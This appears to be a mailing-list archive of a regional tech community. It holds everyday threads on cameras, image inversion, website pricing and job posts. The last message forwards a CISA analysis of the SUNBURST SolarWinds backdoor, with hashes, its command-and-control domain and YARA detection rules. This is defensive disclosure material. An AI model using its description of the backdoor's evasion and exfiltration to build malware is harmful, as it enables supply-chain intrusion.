From debchandler411 at gmail.com Mon Feb 1 02:14:34 2021
From: debchandler411 at gmail.com (Deborah Chandler)
Date: Sun, 31 Jan 2021 21:14:34 -0500
Subject: [Hidden-tech] * * * Experience with GoPro 9? * * *

Hi folks,

A friend is contemplating getting a GoPro 9 for his mobile videography work. Are folks here willing to talk with him about your experience and/or opinion about it? Or are there other video cameras you recommend? He currently has a Sony Handycam.

If you could provide your contact info, I will pass it along to him. He's looking to buy this very soon.

Thanks!
Deb

From yudkinyudkin at yahoo.com Mon Feb 1 13:38:31 2021
From: yudkinyudkin at yahoo.com (Marcia Yudkin)
Date: Mon, 1 Feb 2021 13:38:31 +0000 (UTC)
Subject: [Hidden-tech] Image editing from white on black to black on white?
References: <1300459517.724835.1612186711089.ref@mail.yahoo.com>
Message-ID: <1300459517.724835.1612186711089@mail.yahoo.com>

Hi there,

I have an image that has white lettering on a black background and I'm wondering if it's possible to change it to black lettering on a black background. First of all, is there a word for this type of shift?

Second, is there an online editing program that can do this? I don't have Photoshop. I have occasionally used Pixlr, but I didn't see a way to do that in that program.

Thanks,

Marcia Yudkin
Goshen

From rich at tnrglobal.com Mon Feb 1 16:28:50 2021
From: rich at tnrglobal.com (Rich@tnr)
Date: Mon, 1 Feb 2021 11:28:50 -0500
Subject: [Hidden-tech] Image editing from white on black to black on white?
In-Reply-To: <1300459517.724835.1612186711089@mail.yahoo.com>
References: <1300459517.724835.1612186711089.ref@mail.yahoo.com> <1300459517.724835.1612186711089@mail.yahoo.com>

This is not an instant answer but rather an approach.

We use ImageMagick, which has lots of tools for image manipulation. For us it's on Linux, and it is also available on many web site backends; there are lots of helpful tips about using IM if you search Google. There are versions for Mac or Windows, and on a lark I looked to see if there is a web version. SO (if you want to try) look at https://magickstudio.imagemagick.org/

Stay well - Rich

--
Rich Roth
CEO TnR Global

Bio and personal blog: http://rizbang.com
Building the really big sites: http://www.tnrglobal.com
Small/Soho business in the PV: http://www.hidden-tech.net
Places to meet for business: http://www.meetmewhere.com
And for Arts and relaxation:
http://TarotMuertos.com - Artistic Tarot Deck
http://www.welovemuseums.com
http://www.artonmytv.com/
Helping move the world: http://www.earththrives.com

From yudkinyudkin at yahoo.com Mon Feb 1 16:32:00 2021
From: yudkinyudkin at yahoo.com (Marcia Yudkin)
Date: Mon, 1 Feb 2021 16:32:00 +0000 (UTC)
Subject: [Hidden-tech] Image editing from white on black to black on white?
References: <1300459517.724835.1612186711089.ref@mail.yahoo.com> <1300459517.724835.1612186711089@mail.yahoo.com>
Message-ID: <112362825.780990.1612197120356@mail.yahoo.com>

Oops, I meant I want to change it to be black lettering on a white background.

_______________________________________________
Hidden-discuss mailing list - home page: http://www.hidden-tech.net
Hidden-discuss at lists.hidden-tech.net

You are receiving this because you are on the Hidden-Tech Discussion list.
If you would like to change your list preferences, Go to the Members
page on the Hidden Tech Web site.
http://www.hidden-tech.net/members

From rich at tnrglobal.com Mon Feb 1 16:33:19 2021
From: rich at tnrglobal.com (Rich@tnr)
Date: Mon, 1 Feb 2021 11:33:19 -0500
Subject: [Hidden-tech] who is local who does website ux/ui/branding ?
Message-ID: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com>

SO I didn't get any answers to my prior post for details.
I'd like there were local techies who wanted such work.

How about anyone who does website setup/ux/ui/branding respond? Or recommendations for non-locals you used and liked.

Respond on the list or directly.

As projects come up, I'll ask for quotes.
Stay Well - Rich

-------- Forwarded Message --------
Subject: What is going rate for website ux/ui/branding ?
Date: Fri, 29 Jan 2021 14:03:04 -0500
From: Rich at tnr
Reply-To: rich at tnrglobal.com
To: HT-discuss

I am working on a few projects and need some ballpark costs to build into the numbers.

The cases would all be for a graphic designer+web developer (type not important: individual, team or company).
The site would be Wordpress without needing hosting or technical support - I would be handling that.
SO the needs would include:
- These are medium sized sites; the bulk of content is from various data sources with a few static info pages.
- Basic branding (no high end commercial branding)
- Basic rules as to color and look, perhaps including suggested icons.
- A few sample pages showing these rules
- Recommending generally available themes/plugins (not including the cost of those)
- Reasonable response time, not rushed while not more than 2-3 months either.

I am looking for comments as to what an effort like this would cost; these are not relatively small budget, rather small projects.

Hourly rates by themselves are not helpful - total cost is the question, although a component breakout would be useful.
This is not a request for a quote, although it is an opportunity to get on my list to get details from for specific projects.
Note: this would also give me a chance to update the Hidden-tech directory as to graphic developers.
And please do not respond with anything visual, although URLs are welcome.

For current timing, sooner would be better - at least one of these is part of a grant proposal that needs to be included by Feb 5th (coming Fri).

Stay well all - Rich
From sam at itabix.com Mon Feb 1 17:05:08 2021
From: sam at itabix.com (Sam McClellan)
Date: Mon, 1 Feb 2021 12:05:08 -0500
Subject: [Hidden-tech] Image editing from white on black to black on white?
In-Reply-To: <112362825.780990.1612197120356@mail.yahoo.com>
References: <1300459517.724835.1612186711089.ref@mail.yahoo.com> <1300459517.724835.1612186711089@mail.yahoo.com> <112362825.780990.1612197120356@mail.yahoo.com>

Hi Marcia,

That's called inverting the image. You can do that here http://invert.imageonline.co/ or here https://pinetools.com/invert-image-colors or, if that doesn't work, just do a Google search for "invert image online".

Best,
Sam

Sam McClellan
Itabix, Inc
one place for all things web
sam at itabix.com
https://itabix.com
Main - 413.587.4600
Toll-free - 877-7ITABIX (877.748.2249)

From yudkinyudkin at yahoo.com Mon Feb 1 17:42:03 2021
From: yudkinyudkin at yahoo.com (Marcia Yudkin)
Date: Mon, 1 Feb 2021 17:42:03 +0000 (UTC)
Subject: [Hidden-tech] Image editing from white on black to black on white?
References: <1300459517.724835.1612186711089.ref@mail.yahoo.com> <1300459517.724835.1612186711089@mail.yahoo.com> <112362825.780990.1612197120356@mail.yahoo.com>
Message-ID: <737849884.813522.1612201323596@mail.yahoo.com>

Thank you so much!

I'm all set on this now.

From snmerz at gmail.com Mon Feb 1 17:52:03 2021
From: snmerz at gmail.com (Sabine Merz)
Date: Mon, 1 Feb 2021 12:52:03 -0500
Subject: [Hidden-tech] Facebook locked out - any way to reach them?
In-Reply-To: <1300459517.724835.1612186711089@mail.yahoo.com>
References: <1300459517.724835.1612186711089.ref@mail.yahoo.com> <1300459517.724835.1612186711089@mail.yahoo.com>
Message-ID: <932F2EDB-539C-4BF3-8F16-D992616FDE59@gmail.com>

Hello,

do any of you have a magical way to reach Facebook? Due to a tech issue I have been locked out of Facebook for over three weeks. I need it for work. I have submitted my personal data at least three times and no response?

PS: The reason I am locked out? Two-factor authorization failure on an app I have been using. FB requires me to have two-factor authorization due to a massive FB page I help work on. All recovery efforts have failed.

Thank you!

Best wishes,
Sabine Merz
snmerz at gmail.com
Northampton

From swills at beyond-print.com Tue Feb 2 16:01:55 2021
From: swills at beyond-print.com (swills beyond-print.com)
Date: Tue, 2 Feb 2021 11:01:55 -0500 (EST)
Subject: [Hidden-tech] who is local who does website ux/ui/branding ?
In-Reply-To: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com>
References: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com>
Message-ID: <124973595.236800.1612281715321@webmail.networksolutionsemail.com>

An HTML attachment was scrubbed...
From nathan at justroots.org Tue Feb 2 18:05:08 2021
From: nathan at justroots.org (Nathan Lyczak)
Date: Tue, 2 Feb 2021 13:05:08 -0500
Subject: [Hidden-tech] Salesforce Developer Needed for Just Roots

SEEKING A SALESFORCE DEVELOPER (OR DEVELOPMENT TEAM) FOR JUST ROOTS

WHO IS JUST ROOTS?

Just Roots is a social justice organization that builds equity, connection, health, pride and empowerment in our community and beyond through food-based programs and systems change. Our farm, programming and advocacy efforts connect people to food, opportunity and one another. We do our work by growing food; connecting people of all ages and life experiences with the land; running an all-income CSA (we've got the biggest SNAP-enrolled low-income CSA in the state); cooking community meals; developing partnerships with schools, health insurance companies, legislators, health clinics and other resource agencies; researching the health outcomes of CSA participation and more. We build direct access, models, momentum and evidence for change in agricultural policy, food policy, healthcare policy and social justice. We are a small, efficient, farm-based organization with a goal to change the food system and bring more equity to the world.

OUR SITUATION:

During the past 5 years Just Roots has operated using a custom built Filemaker Pro database solution that barely meets our needs. The volume and sophistication of our work has increased dramatically during the past year, and we have short-term grant funding to move our data onto the Salesforce platform, which will be better suited for our long-term future.

We seek a highly qualified Salesforce developer individual or team that can work extensively on this project during an urgent six-month timeline (see the following page for our ideal implementation schedule).

Our ideal candidate(s) would have proven experience in these areas:
- implementing and customizing the Salesforce NPSP for the fundraising and community development needs of non-profit organizations
- implementing solutions for managing products, invoicing, and the collection and processing of online and cash payments
- the new Salesforce PMM (Program Manager Module)
- special needs of the healthcare industry and HIPAA compliance
- deep care for user-experience/functionality that facilitates a smooth, easeful and supportive work environment for staff/partners and smooth communication/information flow with community members
- a track record of delivering services on time and in budget and that meet the expectations of the customer (references required)

In addition, our ideal candidate would be a team or be connected with other developers with whom they have a history of collaboration that they could bring in in order to meet project deadlines.

We are immediately accepting applicants. We are interviewing qualified applicants on a rolling basis, so if you think you are the right fit for this position, please reach out!

COMPENSATION: $100/hr

Please email: nathan at justroots.org to inquire.

PROJECT TIMELINE: February-June
Exact priorities, order and timeline subject to change

PHASE I -- DATA TRANSFER: FEBRUARY 2021
A database of Just Roots contacts (Names, Addresses), with donation history, and program participation history (memberships, events attended, payments), general & confidential notes, other misc information (household demographics, business affiliation, healthcare provider, role, etc) is moved from Filemaker into Salesforce, and all staff are able to use Salesforce to look up contact information, add notes, record donations, pull reports on contacts individually and collectively etc.

PHASE II -- PROGRAM SERVICES WITH INVOICING: MARCH 2021
Salesforce is equipped to manage CSA memberships (and any other future program services) in a way that can handle:
- multiple types of memberships / services / products / options / pickup-days / delivery locations / prices / payment methods / payment schedules / delivery routing / invoicing / payment collection / attendance / notes
Just Roots should be able to pull reports based on program data (eg: type of membership, product, delivery location) etc.

PHASE III -- REFERRALS / DATA EXCHANGE: APRIL 2021
A HIPAA compliant (if necessary) solution is built and/or adopted that allows:
1. Just Roots can receive referrals by logging into online portals of other agencies (AuntBertha / Look4Help / UniteUs) and transfer that data into Just Roots Salesforce -- first via (a) manually reading and retyping, (b) then by export/import, then (c) via automatic API transfer (if needed).
2. Just Roots can report back to other agencies with data about client participation in our services via (a) retyping it into other agencies' portal, (b) sending via export/import data file, then (c) automatic API transfer (if needed).
3. Other agencies can securely log in to a Just Roots web "portal" to (a) make referrals of clients into Just Roots services and (b) view reports about client participation/notes
Just Roots should be able to pull reports based on program data (eg: type of membership, product, delivery location) etc.

PHASE IV -- FORM CONNECTIONS & FINANCIAL PROCESSING: MAY 2021
Salesforce is connected via webhooks to a form-building platform and a payment platform where staff can effectively construct clear, logic-based forms hosted on the Just Roots website so that people from the outside world can:
(a) register for events and programs
(b) make online donations
(c) make payments on invoices
(d) provide survey responses/input
Just Roots must be able to pull reports based on enrollment status, payment status, donations made for certain campaigns or during a certain time period or at a certain level, survey responses, financial projections, money received etc.

PHASE V -- COMMUNICATIONS CONNECTIONS: JUNE 2021
Salesforce is connected to an email sending platform and texting platform where transactional and bulk emails and texts can be sent ("Mail Chimp, Sendgrid, Constant Contact"). These platforms should gracefully handle:
- unsubscribes & bouncebacks,
- templated transactional messages ("welcome to our CSA", "friendly payment reminder"),
- and bulk sending of nicely-formatted mass emails (newsletters, appeals)
Just Roots must be able to pull reports on/for communications.

From denisefbatalha at gmail.com Tue Feb 2 16:48:17 2021
From: denisefbatalha at gmail.com (Denise Batalha)
Date: Tue, 2 Feb 2021 11:48:17 -0500
Subject: [Hidden-tech] who is local who does website ux/ui/branding ?
In-Reply-To: <124973595.236800.1612281715321@webmail.networksolutionsemail.com>
References: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com> <124973595.236800.1612281715321@webmail.networksolutionsemail.com>

I'm honestly shocked, as well.
I don't know enough to help out, unfortunately, and I'm on the fence on where to go in my career, as far as learning new skills is concerned, such as UX/UI. I only have very basic HTML and website design skills.

I honestly wish I could help. I tend to lowball. LOL Mainly for experience, despite being out in the job market FOREVER... and then got a foot in the door, and that was taken away from me, because COVID... LOL

Denise

On Tue, Feb 2, 2021 at 11:48 AM swills beyond-print.com via Hidden-discuss <hidden-discuss at lists.hidden-tech.net> wrote:

> Hi Rich,
>
> I confess to being a little disappointed that you didn't get any responses. I was curious and hoping to gain some insight myself from this as a discussion. That said, one has to be careful that the discussion doesn't have an appearance of price fixing, which is part of why I didn't offer anything until now.
>
> I will say that a young but talented Graphic Artist/web designer friend of mine puts sites together in the $2500 - $5000 range. That's a price point I can't compete with. Honestly, I've stayed out of the Wordpress arena except where a custom API plugin has been required. Even then, most of the local Western Mass businesses I've talked to opted for manual loading of their data into WP pages vs. the cost of custom development.
>
> I would be curious to hear from others on the topic now that the ice is broken?
>
> Steve Wills (A hidden-tech in Athol, Ma.)
>
> Please wash hands after reading.

From sam at itabix.com Tue Feb 2 18:27:21 2021
From: sam at itabix.com (Sam McClellan)
Date: Tue, 2 Feb 2021 13:27:21 -0500
Subject: [Hidden-tech] who is local who does website ux/ui/branding ?
In-Reply-To: <124973595.236800.1612281715321@webmail.networksolutionsemail.com> References: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com> <124973595.236800.1612281715321@webmail.networksolutionsemail.com> Message-ID: <83d2f1d8-a246-d252-1cbe-3f7847a31bd8@itabix.com> Hi Rich, Sorry I haven't answered until now, lots going on. It's a bit difficult question to answer accurately just based on your description. It seems like they would be simple sites - I'd venture a range between $700 and $1500 depending on how much we'd need to customize the WordPress theme and how we'd connect and display the data sources. And if you wanted multiple sites that use features from the first site, that would lower the cost for the additional sites. I can give you some examples of sites we've done along with their cost. https://connectingpoint.nepm.org/ We just finished doing a complete redesign for New England Public Media's Western Mass television news show. The site was originally an archival site, they wanted to switch it to be more interactive and live and they wanted something very clean and light to highlight the images and video feeds. We switched to a different theme (Divi is our go-to these days). We needed to script the blog pages and the slider to allow for using either an image or a video from either YouTube or their proprietary system. The site includes a timer function, at midnight on Friday it shows a countdown to 6pm along with information information and images about the episode along with buttons for adding you to their mailing list and another to be put on a reminder list for upcoming shows. When the countdown ends at 6pm it refreshes the page and shows the live feed and hides the episode information, then at 6:30 it switches back to the normal site. $2,500. https://presencia.nepm.org/ Also for New England Public Media, we developed this bilingual website for their show. Similar issue with displaying the blog post videos or images. $1730. 
https://www.aomtheatre.com/ Converted the existing WordPress site and set up a custom ticket selection system. $1400. https://mitsuwa.com/ We develop this site for a Chicago advertising agency that has Mitsuwa, a national Japanese grocery store chain, as their client. The ad agency gives us the design and we implement it. We converted their site to Divi, as well. We developed a complex system for them where they can import a batch of products in an Excel spreadsheet (and upload images) to display their products for each of the stores, for a video feed in their stores, for upcoming sales and for vendors and management to preview upcoming sales before they go live. In addition, they can set up banner images and events with images and text. All of these (product batches, individual banners, and individual events) are set to display in any particular store according to an assigned date range. They keep adding functions so I'll just say the conversion to Divi and basic functions I described were approx. $10,000. We're also currently working on a shopping cart system that organizes pickups and deliveries for $5760. https://www.kimata.com/ Another site we developed for the Chicago advertising agency which supplied the design. A personnel site in English and Japanese displaying available jobs in the US and a separate site for Mexico. We created a backend system for managing both applicants and companies. $7500. https://inner-act.com/ Converted an existing site to WordPress and re-developed it and created the animations, they supplied the logo. $1700. Simpler sites we developed and created the logo for: https://oilco-op.com/ - also developed the slideshow, and developed a custom member signup and management system with three different tiers and different pricing depending on the month you sign up. $1900. https://wellspringneuro.com/ $650. https://adimech.com/ $650. https://optimalbrain.com/ $650. 
best, Sam *Sam McClellan* ** *Itabix, Inc* ** *one place for all things **web*** ** *sam at itabix.com* ** *https://itabix.com* ** *Main - 413.587.4600* ** *Toll-free - 877-7ITABIX (877.748.2249) * >> Subject: What is going rate for website ux/ui/branding ? >> Date: Fri, 29 Jan 2021 14:03:04 -0500 >> From: Rich at tnr >> Reply-To: rich at tnrglobal.com >> To: HT-discuss >> >> >> >> I am working on a few projects and need some ballpark costs to build >> into the numbers. >> >> The cases would all be for a graphic designer+web developer (type not >> important: individual, team or company) >> The site would be Wordpress without needing hosting or technical >> support - I would be handling that. >> SO the needs would include: >> ??? ??? This are medium sized sites, the bulk of content is from >> various data sources with a few static info pages. >> ??? ??? Basic branding (no high end commercial branding) >> ??? ??? Basic rules as to color and look, perhaps including suggested >> icons. >> ??? ??? A few sample pages showing these rules >> ??? ??? Recommending generally available themes/plugins (not >> including the cost of those) >> ??? ??? Reasonable response time, not rushed while not more that 2-3 >> months either. >> >> I am looking for comments are to what an effort like this would cost, >> these is not relatively small budget, rather small projects. >> >> Hourly rates by themselves not helpful - total cost is question, >> although component breakout would be useful >> This is not a request for a quote, although it is an opportunity to >> get on my list of to get details from for specific projects. >> Note: this would also give me a chance to update the Hidden-tech >> directory as to graphic developers. >> And please do no respond with anything visual although URLs are welcome. 
>>
>> For current timing, sooner would be better - at least one of these is part of a grant proposal that needs to be included by Feb 5th (coming Fri).
>>
>> Stay well all - Rich
>>
>> --
>> Rich Roth
>> CEO TnR Global
>> Bio and personal blog: http://rizbang.com
>> Building the really big sites: http://www.tnrglobal.com
>> Small/Soho business in the PV: http://www.hidden-tech.net
>> Places to meet for business: http://www.meetmewhere.com
>> And for Arts and relaxation:
>> http://TarotMuertos.com - Artistic Tarot Deck
>> http://www.welovemuseums.com
>> http://www.artonmytv.com/
>> Helping move the world: http://www.earththrives.com
>
> Please wash hands after reading.
From rich at tnrglobal.com Wed Feb 3 19:11:01 2021
From: rich at tnrglobal.com (Rich@tnr)
Date: Wed, 3 Feb 2021 14:11:01 -0500
Subject: [Hidden-tech] Cybersecurity Instructors - needs
Message-ID: <6cced839-f9e6-389f-90b1-184840c97471@tnrglobal.com>

See below - respond to Jonathan directly

---------------------------------------------------------------------------
From: Jonathan Edwards
Subject: Cybersecurity Instructors

Message Body:
CyberWarrior Academy (www.cyberwarrior.com) is looking for instructors and Teaching Assistants who can teach cybersecurity skills, from basic skills such as A+, Security+ and Certified Ethical Hacker through other skills such as Network Penetration, Firewalls & IDPS, Malware Analysis, etc. Our next class starts on Monday, March 15th and runs for 28 weeks. Classes are taught Monday through Friday from 5:30pm to 9:30pm.
------------------------------------------------------------------------------

--
Rich Roth
CEO TnR Global
Bio and personal blog: http://rizbang.com
Building the really big sites: http://www.tnrglobal.com
Small/Soho business in the PV: http://www.hidden-tech.net
Places to meet for business: http://www.meetmewhere.com
And for Arts and relaxation:
http://TarotMuertos.com - Artistic Tarot Deck
http://www.welovemuseums.com
http://www.artonmytv.com/
Helping move the world: http://www.earththrives.com

From rob at 2disc.com Mon Feb 8 13:52:25 2021
From: rob at 2disc.com (Rob Laporte)
Date: Mon, 8 Feb 2021 13:52:25 +0000
Subject: [Hidden-tech] who is local who does website ux/ui/branding ?
In-Reply-To: <83d2f1d8-a246-d252-1cbe-3f7847a31bd8@itabix.com>
References: <6246f433-4a11-789c-7f3e-8152f6cb1b31@tnrglobal.com> <124973595.236800.1612281715321@webmail.networksolutionsemail.com>, <83d2f1d8-a246-d252-1cbe-3f7847a31bd8@itabix.com>
Message-ID:

Hi Sam,

Wow, Itabix does a lot.
Years ago my search marketing firm began extricating ourselves from any web dev, to focus on our core expertise in search marketing and conversion rate optimization, and to avoid the burgeoning complexity, risks, and potential legal liabilities in web dev and hosting. We often refer clients and prospects to firms we like.

I have a few questions I share with the HT list here, so all may know. I suggest putting such answers on your About Us page.

Who is on your team, and what are their specialties and backgrounds? I've found that these days, and increasingly, adequacy, to say nothing of excellence, requires ever more specialization. Website security, technical SEO within general SEO, Local SEO, PPC search vs. display, ROI planning, website design, website coding (even in WP), and more, increasingly demand one dedicated pro for each. If your team can pull off adequacy in all the services on your website--and for the incredible prices you cite--your team and management systems must be first-rate, and worth Western Mass knowing about.

Take Care,

Rob Laporte
Chief Business Development Officer | Founder | Chairman
DISC - Making Websites Make Money
413-584-6500
rob at 2disc.com | LinkedIn | 2DISC.com

NOTE: Emails can be blocked by spam filters throughout the web. If you don't get a reply within an expected span of time, please call.

________________________________
From: Hidden-discuss on behalf of Sam McClellan via Hidden-discuss
Sent: Tuesday, February 2, 2021 1:27 PM
To: hidden-discuss at lists.hidden-tech.net
Subject: Re: [Hidden-tech] who is local who does website ux/ui/branding ?

Hi Rich,

Sorry I haven't answered until now, lots going on. It's a bit of a difficult question to answer accurately just based on your description. It seems like they would be simple sites - I'd venture a range between $700 and $1500 depending on how much we'd need to customize the WordPress theme and how we'd connect and display the data sources.
And if you wanted multiple sites that use features from the first site, that would lower the cost for the additional sites.

I can give you some examples of sites we've done along with their cost.

https://connectingpoint.nepm.org/ We just finished doing a complete redesign for New England Public Media's Western Mass television news show. The site was originally an archival site; they wanted to switch it to be more interactive and live, and they wanted something very clean and light to highlight the images and video feeds. We switched to a different theme (Divi is our go-to these days). We needed to script the blog pages and the slider to allow for using either an image or a video from either YouTube or their proprietary system. The site includes a timer function: at midnight on Friday it shows a countdown to 6pm along with information and images about the episode, along with buttons for adding you to their mailing list and another to be put on a reminder list for upcoming shows. When the countdown ends at 6pm it refreshes the page and shows the live feed and hides the episode information, then at 6:30 it switches back to the normal site. $2,500.

https://presencia.nepm.org/ Also for New England Public Media, we developed this bilingual website for their show. Similar issue with displaying the blog post videos or images. $1730.

https://www.aomtheatre.com/ Converted the existing WordPress site and set up a custom ticket selection system. $1400.

https://mitsuwa.com/ We developed this site for a Chicago advertising agency that has Mitsuwa, a national Japanese grocery store chain, as their client. The ad agency gives us the design and we implement it. We converted their site to Divi, as well. We developed a complex system for them where they can import a batch of products in an Excel spreadsheet (and upload images) to display their products for each of the stores, for a video feed in their stores, for upcoming sales, and for vendors and management to preview upcoming sales before they go live. In addition, they can set up banner images and events with images and text. All of these (product batches, individual banners, and individual events) are set to display in any particular store according to an assigned date range. They keep adding functions, so I'll just say the conversion to Divi and the basic functions I described were approx. $10,000. We're also currently working on a shopping cart system that organizes pickups and deliveries for $5760.

https://www.kimata.com/ Another site we developed for the Chicago advertising agency, which supplied the design. A personnel site in English and Japanese displaying available jobs in the US, and a separate site for Mexico. We created a backend system for managing both applicants and companies. $7500.

https://inner-act.com/ Converted an existing site to WordPress, re-developed it and created the animations; they supplied the logo. $1700.

Simpler sites we developed and created the logo for:

https://oilco-op.com/ - also developed the slideshow, and developed a custom member signup and management system with three different tiers and different pricing depending on the month you sign up. $1900.
https://wellspringneuro.com/ $650.
https://adimech.com/ $650.
https://optimalbrain.com/ $650.

best,
Sam

Sam McClellan
Itabix, Inc
one place for all things web
sam at itabix.com
https://itabix.com
Main - 413.587.4600
Toll-free - 877-7ITABIX (877.748.2249)
From rich at tnrglobal.com Mon Feb 8 17:59:32 2021
From: rich at tnrglobal.com (Rich@tnr)
Date: Mon, 8 Feb 2021 12:59:32 -0500
Subject: [Hidden-tech] Fwd: MK: AR21-039A: MAR-10318845-1.v1 - SUNBURST
In-Reply-To: <16954503.52401@ncas.us-cert.gov>
References: <16954503.52401@ncas.us-cert.gov>
Message-ID: <91123ec4-ce26-f8b5-6b5e-6b2357da18dd@tnrglobal.com>

For those interested - I am sending this (you can subscribe yourself; I don't generally forward posts from US-CERT). They come out a few times a week.

-------- Forwarded Message --------
Subject: MK: AR21-039A: MAR-10318845-1.v1 - SUNBURST
Date: Mon, 08 Feb 2021 17:10:02 +0000
From: US-CERT
Reply-To: US-CERT at ncas.us-cert.gov
To: michaelk at tnrglobal.com

AR21-039A: MAR-10318845-1.v1 - SUNBURST
Cybersecurity and Infrastructure Security Agency (CISA) - Defend Today, Secure Tomorrow

You are subscribed to National Cyber Awareness System Analysis Reports for Cybersecurity and Infrastructure Security Agency. This information has recently been updated, and is now available.

AR21-039A: MAR-10318845-1.v1 - SUNBURST
02/08/2021 11:00 AM EST
Original release date: February 8, 2021

Description

Malware Analysis Report 10318845.r1.v1
2021-02-05

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction.
For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This report provides detailed analysis of several malicious artifacts associated with a sophisticated supply chain compromise of SolarWinds Orion network management software, identified by the security company FireEye as SUNBURST. After being delivered as part of certain SolarWinds updates, a trojanized version of "solarwinds.orion.core.businesslayer.dll" containing SUNBURST malware is installed by a legitimate SolarWinds installer application. The modified dynamic-link library (DLL) contains an obfuscated backdoor that allows a remote operator to execute various functions on the compromised system, as well as deploy additional payloads and exfiltrate data. The embedded SUNBURST code obfuscates its outbound communications to the remote operator with a single-byte XOR and a modified Base64 encoding; the XOR key byte travels with each message, so this is obfuscation rather than encryption, and a captured exchange can be decoded without any secret. To maintain a low profile, the SUNBURST code will not run if it detects certain security software running on the target system.

For a downloadable copy of IOCs, see: MAR-10318845-1.v1.stix

Submitted Files (4)

019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 (SolarWinds.Orion.Core.Business...)
32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 (SolarWinds.Orion.Core.Business...)
ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 (SolarWinds.Orion.Core.Business...)
d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 (SolarWinds-Core-v2019.4.5220-H...)
Domains (1)

avsvmcloud.com

Findings

32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77

Tags: backdoor, remote-access-trojan, trojan

Details
Name: SolarWinds.Orion.Core.BusinessLayer.dll
Size: 1011032 bytes
Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5: b91ce2fa41029f6955bff20079468448
SHA1: 76640508b1e7759e548771a5359eaed353bf1eec
SHA256: 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77
SHA512: 6a81f082f36ccbda48070772c5a97e1d7de61ad77465e7befe8cbd97df40dcc5da09c461311708e3d57527e323484b05cfd3e72a3c70e106e47f44cc77584bd7
ssdeep: 12288:Zx7m/z9aEBzvnvLtYAi6uLlYQ69BBpIvF1tjpH7BKi+0A8vca9owQ:6aEBTvRBi6uL6dIvDtjpH9+0A8vca9oD
Entropy: 5.582827

Antivirus
Ahnlab: Backdoor/Win32.SunBurst
Antiy: Trojan[Backdoor]/MSIL.Agent
Avira: TR/Sunburst.AO
BitDefender: Trojan.Sunburst.A
Clamav: Win.Countermeasure.Sunburst-9809152-0
Comodo: Backdoor
Cyren: W32/Trojan.BCCG-2955
ESET: a variant of MSIL/SunBurst.A trojan
Emsisoft: Trojan.Win32.Sunburst (A)
Ikarus: Backdoor.Sunburst
K7: Trojan ( 00574a531 )
Lavasoft: Trojan.Sunburst.A
McAfee: Trojan-sunburst
Microsoft Security Essentials: Trojan:MSIL/Solorigate.BR!dha
NANOAV: Trojan.Win32.SunBurst.iduxjk
Sophos: Mal/Sunburst-A
Symantec: Backdoor.Sunburst!gen1
Systweak: trojan-backdoor.sunburst-r
TrendMicro: Backdoo.6F8C6A1E
TrendMicro House Call: Backdoo.6F8C6A1E
Vir.IT eXplorer: Trojan.Win32.SunBurst.A
VirusBlokAda: TScope.Trojan.MSIL
Zillya!: Backdoor.Sunburst.Win32.2

YARA Rules

rule CISA_10318927_01 : trojan rat SOLAR_FIRE
{
    meta:
        Author = "CISA Code & Media Analysis"
        Incident = "10318927"
        Date = "2020-12-13"
        Last_Modified = "20201213_2145"
        Actor = "n/a"
        Category = "TROJAN RAT"
        Family = "SOLAR_FIRE"
        Description = "This signature is based off of unique strings embedded within the modified Solar Winds app"
        MD5_1 = "b91ce2fa41029f6955bff20079468448"
        SHA256_1 = "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77"
        MD5_2 = "846e27a652a5e1bfbd0ddd38a16dc865"
        SHA256_2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6"
    strings:
        $s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 }
        $s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 }
        $s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41 00 41 00 3D 00 3D }
        $s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B 00 53 00 79 00 30 00 42 }
    condition:
        all of them
}

rule FireEye_20_00025668_01 : SUNBURST APT backdoor
{
    meta:
        Author = "FireEye"
        Date = "2020-12-13"
        Last_Modified = "20201213_1917"
        Actor = "n/a"
        Category = "Backdoor"
        Family = "SUNBURST"
        Description = "This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions. The first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver names/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services."
        MD5_1 = ""
        SHA256_1 = ""
    strings:
        $cmd_regex_encoded = "U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA" wide
        $cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }
